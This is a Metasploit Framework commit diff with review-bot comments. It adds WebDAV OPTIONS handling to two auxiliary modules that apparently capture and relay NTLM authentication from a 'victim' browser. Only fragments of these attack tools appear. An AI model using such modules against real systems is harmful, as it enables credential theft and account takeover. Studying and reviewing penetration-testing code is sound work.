Merge branch 'webdav_fix' of https://github.com/mubix/metasploit-framework into mubix-webdav_fix

unstable
sinn3r 2012-08-24 11:18:50 -05:00
commit 3036f7725d
2 changed files with 86 additions and 42 deletions


@ -68,6 +68,10 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status("Request '#{request.uri}'...") print_status("Request '#{request.uri}'...")
case request.method
when 'OPTIONS'
process_options(cli, request)
else
# If the host has not started auth, send 401 authenticate with only the NTLM option # If the host has not started auth, send 401 authenticate with only the NTLM option
if(!request.headers['Authorization']) if(!request.headers['Authorization'])
response = create_response(401, "Unauthorized") response = create_response(401, "Unauthorized")
@ -86,6 +90,7 @@ class Metasploit3 < Msf::Auxiliary
cli.send_response(response) cli.send_response(response)
end end
end end
end
def run def run
if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/ if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{16})$/
@ -97,6 +102,23 @@ class Metasploit3 < Msf::Auxiliary
exploit() exploit()
end end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
def handle_auth(cli,hash) def handle_auth(cli,hash)
#authorization string is base64 encoded message #authorization string is base64 encoded message
message = Rex::Text.decode_base64(hash) message = Rex::Text.decode_base64(hash)
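Review bot: `print_status("OPTIONS #{request.uri}")` in the new `process_options` interpolates the client-supplied URI into operator output unescaped, and `on_request_uri` has already printed `Request '#{request.uri}'...` for the same request before the `case`, so each OPTIONS request is logged twice. Assuming `request.uri` is a String, `print_status("OPTIONS #{request.uri.inspect}")` would keep control characters sent by a remote client out of the console and any saved log, or the second line could simply be dropped. The same method is added verbatim to the second file in this commit; moving it into one shared mixin would keep the two copies from drifting. `on_request_uri` continues past the end of the first hunk, so the rest of the `else` branch is not visible here.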


@ -94,6 +94,10 @@ class Metasploit3 < Msf::Auxiliary
# Handles the initial requests waiting for the browser to try NTLM auth # Handles the initial requests waiting for the browser to try NTLM auth
def on_request_uri(cli, request) def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
process_options(cli, request)
else
datastore['REQUEST_IP'] = cli.peerhost datastore['REQUEST_IP'] = cli.peerhost
cli.keepalive = true; cli.keepalive = true;
@ -126,12 +130,30 @@ class Metasploit3 < Msf::Auxiliary
handle_relay(cli,hash) handle_relay(cli,hash)
end end
end
def run def run
parse_args() parse_args()
exploit() exploit()
end end
def process_options(cli, request)
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#The call to handle_relay should be a victim HTTP type 1 request #The call to handle_relay should be a victim HTTP type 1 request
def handle_relay(cli_sock, hash) def handle_relay(cli_sock, hash)
print_status("Beginning NTLM Relay...") print_status("Beginning NTLM Relay...")
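Review bot: The new `case request.method` wraps the whole existing body of `on_request_uri` in an `else`, so the OPTIONS path now returns before `datastore['REQUEST_IP'] = cli.peerhost` and `cli.keepalive = true` run, and nothing says whether that is intended. A guard clause at the top, `return process_options(cli, request) if request.method == 'OPTIONS'`, would make the early exit explicit and avoid re-indenting the rest of the method. `process_options` should also carry a comment such as `# Answers WebDAV OPTIONS probes; 207 with an empty text/xml body is deliberate` if that combination is intended, since 207 Multi-Status normally carries an XML body. The middle of `on_request_uri` lies between the two hunks and is not shown.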